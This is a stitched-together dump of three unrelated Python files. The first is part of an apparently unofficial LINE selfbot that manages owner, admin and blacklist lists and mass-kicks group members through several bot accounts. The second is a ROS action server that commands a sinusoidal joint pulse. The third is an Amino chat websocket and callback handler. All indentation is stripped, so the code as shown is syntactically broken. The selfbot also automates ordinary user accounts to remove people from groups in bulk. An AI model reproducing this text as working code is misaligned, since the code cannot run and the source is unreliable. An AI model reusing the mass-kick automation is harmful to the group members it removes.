sendMention(to,"[ Delete Squad ]\nUser @! Deleted From Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nOwner Permission")
elif hlth.startswith("add ban"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["blacklist"].append(target)
sendMention(to,"[ Add Blacklist ]\nUser @! Added To Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nOwner Permission")
elif hlth.startswith("del ban"):
if sender in creator or sender in owner:
key = json.loads(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
try:
status["blacklist"].remove(target)
sendMention(to,"[ Delete Blacklist ]\nUser @! Deleted From Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nOwner Permission")
elif hlth.startswith("owner:"):
if sender in creator:
spl = hlth.replace("owner:","")
if spl == "recruit":
settings["addowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nCreator Permission")
elif hlth.startswith("admin:"):
if sender in creator or sender in owner:
spl = hlth.replace("admin:","")
if spl == "recruit":
settings["addadmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nPlease Send Contact To Add")
if spl == "expel":
settings["deladmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("staff:"):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("staff:","")
if spl == "recruit":
settings["addstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nAdmin Permission")
elif hlth.startswith("squad:"):
if sender in creator or sender in owner:
spl = hlth.replace("squad:","")
if spl == "add":
settings["addbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nPlease Send Contact To Add")
if spl == "del":
settings["delbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("ban:"):
if sender in creator or sender in owner:
spl = hlth.replace("ban:","")
if spl == "add":
settings["addban"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nPlease Send Contact To Add")
if spl == "del":
settings["delban"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth == "abort" or hlth == "eject":
if sender in creator:
settings["addadmin"] = False
settings["addban"] = False
settings["addbots"] = False
settings["addowner"] = False
settings["addstaff"] = False
settings["deladmin"] = False
settings["delban"] = False
settings["delbots"] = False
settings["delowner"] = False
settings["delstaff"] = False
a001.sendReplyMessage(reply,receiver,"Command Aborted")
elif hlth.startswith("grouplist "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("grouplist ","")
if spl == "1":
group = a001.getGroupIdsJoined()
getg = a001.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp1)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a001.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "2":
group = a002.getGroupIdsJoined()
getg = a002.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp2)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a002.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "3":
group = a003.getGroupIdsJoined()
getg = a003.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp3)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a003.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
elif hlth == "memberlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Member List\n┣━━━━ {}".format(getg.name)
if getg.members is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.members:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Member" % len(getg.members)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "pendinglist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Pending List\n┣━━━━ {}".format(getg.name)
if getg.invitee is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.invitee:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Pending" % len(getg.invitee)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "protectlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
a = 0
b = 0
for ls in promax:
a = a + 1
ma += '┣ ' + str(a) + ". " +a001.getGroup(ls).name + "\n"
for ls in strictmode:
b = b + 1
mb += '┣ ' + str(b) + ". " +a001.getGroup(ls).name + "\n"
a001.sendReplyMessage(reply, receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Protect\n┣━━━━ Protect Max\n"+ma+"┣━━━━ Strict Mode\n"+mb+"┗━ Total [ %s ] Protection" %(str(len(promax)+len(strictmode))))
elif hlth == "purge":
if sender in creator or sender in owner:
group = a001.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
match = [m for m in gMembMids if m in status["blacklist"]]
if match == []:
a001.sendReplyMessage(reply,receiver,"Nothing")
return
for fck in match:
try:
fckX = threading.Thread(target=kick, args=(receiver, fck)).start()
except:
pass
elif hlth.startswith("protect "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("protect ","")
if spl == "max":
if receiver in status["promax"]:
hlth = "Group Protection Max"
else:
status["promax"].append(receiver)
hlth = "Access Granted - Protection Active"
try:
group = a001.getGroup(receiver)
if group.preventedJoinByTicket == False:
progqr = a001.getGroup(receiver)
progqr.preventedJoinByTicket = True
a001.updateGroup(progqr)
settings["changeGroupName"][receiver] = group.name
settings["changeGroupPicture"][receiver] = group.pictureStatus
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
if spl == "none":
if receiver in status["promax"]:
status["promax"].remove(receiver)
hlth = "Access Granted - Protection Nonactive"
else:
hlth = "Group Protection None"
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
elif hlth.startswith("strictmode "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("strictmode ","")
if spl == "on":
if receiver in status["strictmode"]:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nStill Active")
else:
status["strictmode"].append(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Enable")
try:
a001.inviteIntoGroup(receiver,[M003D23])
except:
try:
a002.inviteIntoGroup(receiver,[M003D23])
except:
try:
a003.leaveGroup(receiver)
except:
pass
if spl == "off":
if receiver in status["strictmode"]:
status["strictmode"].remove(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Disable")
try:
a003.acceptGroupInvitation(receiver)
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nNot Active")
elif hlth.startswith("checkbot"):
if sender in creator or sender in owner or sender in admin:
try:
    a001.inviteIntoGroup(receiver, [M001D23])
    has = "OK"
except:
    has = "NOT"
try:
    a001.kickoutFromGroup(receiver, [M001D23])
    has1 = "OK"
except:
    has1 = "NOT"
sil = "Normal" if has == "OK" else "Down!"
sil1 = "Normal" if has1 == "OK" else "Down!"
a001.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil, sil1))
try:
    a002.inviteIntoGroup(receiver, [M002D23])
    has = "OK"
except:
    has = "NOT"
try:
    a002.kickoutFromGroup(receiver, [M002D23])
    has1 = "OK"
except:
    has1 = "NOT"
sil = "Normal" if has == "OK" else "Down!"
sil1 = "Normal" if has1 == "OK" else "Down!"
a002.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil, sil1))
try:
    a003.inviteIntoGroup(receiver, [M003D23])
    has = "OK"
except:
    has = "NOT"
try:
    a003.kickoutFromGroup(receiver, [M003D23])
    has1 = "OK"
except:
    has1 = "NOT"
sil = "Normal" if has == "OK" else "Down!"
sil1 = "Normal" if has1 == "OK" else "Down!"
a003.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil, sil1))
elif hlth.startswith("changename:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a001.getProfile()
dname.displayName = name
a001.updateProfile(dname)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a002.getProfile()
dname.displayName = name
a002.updateProfile(dname)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a003.getProfile()
dname.displayName = name
a003.updateProfile(dname)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname1 = a001.getProfile()
dname1.displayName = name
a001.updateProfile(dname1)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname2 = a002.getProfile()
dname2.displayName = name
a002.updateProfile(dname2)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname3 = a003.getProfile()
dname3.displayName = name
a003.updateProfile(dname3)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a001.getProfile()
bio.statusMessage = name
a001.updateProfile(bio)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a002.getProfile()
bio.statusMessage = name
a002.updateProfile(bio)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a003.getProfile()
bio.statusMessage = name
a003.updateProfile(bio)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio1 = a001.getProfile()
bio1.statusMessage = name
a001.updateProfile(bio1)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio2 = a002.getProfile()
bio2.statusMessage = name
a002.updateProfile(bio2)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio3 = a003.getProfile()
bio3.statusMessage = name
a003.updateProfile(bio3)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changepict:"):
if sender in creator or sender in owner:
spl = hlth.replace("changepict:","")
if spl == "1":
settings["updatePict"][M001D23] = True
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "2":
settings["updatePict"][M002D23] = True
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "3":
settings["updatePict"][M003D23] = True
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "all":
settings["updatePict"][M001D23] = True
settings["updatePict"][M002D23] = True
settings["updatePict"][M003D23] = True
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
else:
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nAccess Limited For Owner Only")
elif hlth.startswith("kick"):
if sender in creator or sender in owner:
key = ast.literal_eval(msg.contentMetadata["MENTION"])
targets = [x["M"] for x in key["MENTIONEES"]]
for target in targets:
if target in creator or target in owner or target in admin or target in staff or target in Bots or target in mybots:
pass
else:
try:
    threading.Thread(target=kick, args=(receiver, target)).start()
except:
    pass
elif hlth.startswith("invite "):
if sender in creator or sender in owner:
if 'MENTION' in msg.contentMetadata:
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
try:
    threading.Thread(target=invite, args=(receiver, ls)).start()
except:
    pass
elif hlth.startswith("invto "):
if sender in creator or sender in owner:
cond = text.split(" ")
num = int(cond[1])
gid = a001.getGroupIdsJoined()
group = a001.getGroup(gid[num-1])
a001.findAndAddContactsByMid(sender)
a001.inviteIntoGroup(gid[num-1],[sender])
a001.sendReplyMessage(reply,receiver, "Invited: "+str(group.name))
if op.type == 15 or op.type == 128:
if op.type == 15: print ("[ 15 ] NOTIFIED LEAVE GROUP")
else: print ("[ 128 ] NOTIFIED DELETE SELF FROM CHAT")
if op.param1 in status["strictmode"]:
if op.param2 == M003D23:
try:
    threading.Thread(target=invite, args=(op.param1, op.param2)).start()
except:
    pass
backupData()
except Exception as error:
logError(error)
traceback.print_tb(error.__traceback__)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def run():
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
loop.run_until_complete(mobanzu(op))
oepoll.setRevision(op.revision)
except Exception as error:
logError(error)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
if __name__ == '__main__':
    print('\n》》》》PROGRAM STARTED《《《《\n')
    run()
|
pulse_motion_server.py
|
#! /usr/bin/env python
"""
pulse_motion.py
Zhiang Chen, Nov 2020
"""
import rospy
from std_msgs.msg import Float64
from sensor_msgs.msg import JointState
import actionlib
import pbr_gazebo.msg
from threading import Thread
from collections import deque
import numpy as np
from numpy import pi, sin
class PulseMotion(object):
def __init__(self, action_name='pulse_motion_server'):
self.default_vel = 0.0
# joint state subscriber
self.x = 0
rospy.Subscriber("/prismatic_box_controller/joint_states", JointState, self.jointstate_cb)
# velocity controller
self.Hz = 200
self.vel_pub = rospy.Publisher('/prismatic_box_controller/prismatic_joint_controller/command', Float64, queue_size=10)
self.vel_command = self.default_vel
self.vel_thread = Thread(target=self.send_vel, args=())
self.vel_thread.daemon = True
self.vel_thread.start()
# pulse motion action server
self._feedback = pbr_gazebo.msg.AFFeedback()
self._result = pbr_gazebo.msg.AFResult()
self._as = actionlib.SimpleActionServer(action_name, pbr_gazebo.msg.AFAction,
execute_cb=self.execute_cb, auto_start=False)
self._as.start()
rospy.loginfo("pulse_motion_planner/" + action_name + " has been initialized!")
def execute_cb(self, goal):
A = goal.A
F = goal.F
rate = rospy.Rate(self.Hz) # Hz
if A*F == 0:
# reset
err = - self.x
errs = deque(maxlen=5)
errs.append(0)
P = 1
I = 0.2
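# PI correction on the position error (P and I gains above): err = -self.x
# drives the joint back toward x = 0, the I term averages the last 5 errors
# (the deque), and the loop exits once |err| <= 0.001 in joint units.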
while abs(err)>0.001:
self.vel_command = P*err + I*np.array(errs).mean()
rate.sleep()
err = - self.x
errs.append(err)
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('reset completed')
else:
# pulse motion
# displacement function: d = -A*cos(2*pi*F*t) + A
# velocity function: v = 2*pi*A*F*sin(2*pi*F*t)
# acceleration function: a = 4*pi^2*F^2*A*cos(2*pi*F*t)
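# Worked example (illustrative numbers, not from the package): A = 0.05, F = 2 Hz
# gives T = 0.5 s, step_nm = int(0.5 * 200) + 1 = 101 velocity commands at 200 Hz,
# and a peak commanded velocity of 2*pi*A*F ~= 0.63 (joint length units per second).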
print(goal)
T = 1. / F # T is rock displacement period
step_nm = int(T*self.Hz)+1 # self.Hz is the control rate;
# step_nm is the number of velocity commands to publish
for j in range(step_nm):
t = j*(1./self.Hz)
self.vel_command = 2*pi*A*F*sin(2*pi*F*t)
# print('t', t)
# print('F', F)
# print('A', A)
# print(2*pi*t/F)
# print(self.vel_command)
# print('-')
rate.sleep()
self.vel_command = self.default_vel
self._result.success = True
self._as.set_succeeded(self._result)
rospy.loginfo('pulse motion completed')
def jointstate_cb(self, data):
self.x = data.position[0]
def send_vel(self):
rate = rospy.Rate(self.Hz) # Hz
while not rospy.is_shutdown():
self.vel_pub.publish(self.vel_command)
rate.sleep()
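# Client-side sketch (assumed usage; AFGoal's A and F fields mirror execute_cb above):
#   client = actionlib.SimpleActionClient('pulse_motion_server', pbr_gazebo.msg.AFAction)
#   client.wait_for_server()
#   client.send_goal(pbr_gazebo.msg.AFGoal(A=0.05, F=2.0))  # one displacement pulse
#   client.send_goal(pbr_gazebo.msg.AFGoal(A=0.0, F=0.0))   # A*F == 0 runs the reset branch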
if __name__ == '__main__':
rospy.init_node("pulse_motion_planner", anonymous=False)
pulse_motion_planner = PulseMotion()
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Node killed!")
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
if socket_trace: websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.debug = debug
self.active = True
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
self.socket_stop = False
self.socketDelay = 0
self.socket_trace = socket_trace
self.socketDelayFetch = 120 # Reconnects every 120 seconds.
def run_socket(self):
threading.Thread(target=self.reconnect_handler).start()
websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
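# Timing sketch: socketDelay grows by 5 on each 5-second tick, so with
# socketDelayFetch = 120 the socket is torn down and reopened roughly every
# two minutes while self.active is True.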
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
    if self.debug:
        print("[socket][on_close] reconnect is True, Opening Socket")
    self.start()
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
with contextlib.suppress(Exception):
    self.socket.sock.pong(data)
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
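# signbody is "<device_id>|<timestamp in ms>" with the pipe URL-encoded as %7C,
# matching the f-string below.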
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
def __init__(self, client):
self.client = client
self.handlers = {}
self.methods = {
304: self._resolve_chat_action_start,
306: self._resolve_chat_action_end,
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"1:0": self.on_strike_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"50:0": self.TYPE_USER_SHARE_EXURL,
"51:0": self.TYPE_USER_SHARE_USER,
"52:0": self.on_voice_chat_not_answered,
"53:0": self.on_voice_chat_not_cancelled,
"54:0": self.on_voice_chat_not_declined,
"55:0": self.on_video_chat_not_answered,
"56:0": self.on_video_chat_not_cancelled,
"57:0": self.on_video_chat_not_declined,
"58:0": self.on_avatar_chat_not_answered,
"59:0": self.on_avatar_chat_not_cancelled,
"60:0": self.on_avatar_chat_not_declined,
"100:0": self.on_delete_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite,
"104:0": self.on_chat_background_changed,
"105:0": self.on_chat_title_changed,
"106:0": self.on_chat_icon_changed,
"107:0": self.on_voice_chat_start,
"108:0": self.on_video_chat_start,
"109:0": self.on_avatar_chat_start,
"110:0": self.on_voice_chat_end,
"111:0": self.on_video_chat_end,
"112:0": self.on_avatar_chat_end,
"113:0": self.on_chat_content_changed,
"114:0": self.on_screen_room_start,
"115:0": self.on_screen_room_end,
"116:0": self.on_chat_host_transfered,
"117:0": self.on_text_message_force_removed,
"118:0": self.on_chat_removed_message,
"119:0": self.on_text_message_removed_by_admin,
"120:0": self.on_chat_tip,
"121:0": self.on_chat_pin_announcement,
"122:0": self.on_voice_chat_permission_open_to_everyone,
"123:0": self.on_voice_chat_permission_invited_and_requested,
"124:0": self.on_voice_chat_permission_invite_only,
"125:0": self.on_chat_view_only_enabled,
"126:0": self.on_chat_view_only_disabled,
"127:0": self.on_chat_unpin_announcement,
"128:0": self.on_chat_tipping_enabled,
"129:0": self.on_chat_tipping_disabled,
"65281:0": self.on_timestamp_message,
"65282:0": self.on_welcome_message,
"65283:0": self.on_invite_message
}
self.chat_actions_start = {
"Typing": self.on_user_typing_start,
}
self.chat_actions_end = {
"Typing": self.on_user_typing_end,
}
def _resolve_chat_message(self, data):
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def _resolve_chat_action_start(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_start.get(key, self.default)(data)
def _resolve_chat_action_end(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_end.get(key, self.default)(data)
def resolve(self, data):
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def call(self, type, data):
if type in self.handlers:
for handler in self.handlers[type]:
handler(data)
def event(self, type):
def registerHandler(handler):
if type in self.handlers:
self.handlers[type].append(handler)
else:
self.handlers[type] = [handler]
return handler
return registerHandler
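# Usage sketch (assumed wiring; handler names match the chat_methods keys above):
#   callbacks = Callbacks(client)
#   @callbacks.event("on_text_message")
#   def handle_text(event):
#       print(event)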
def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
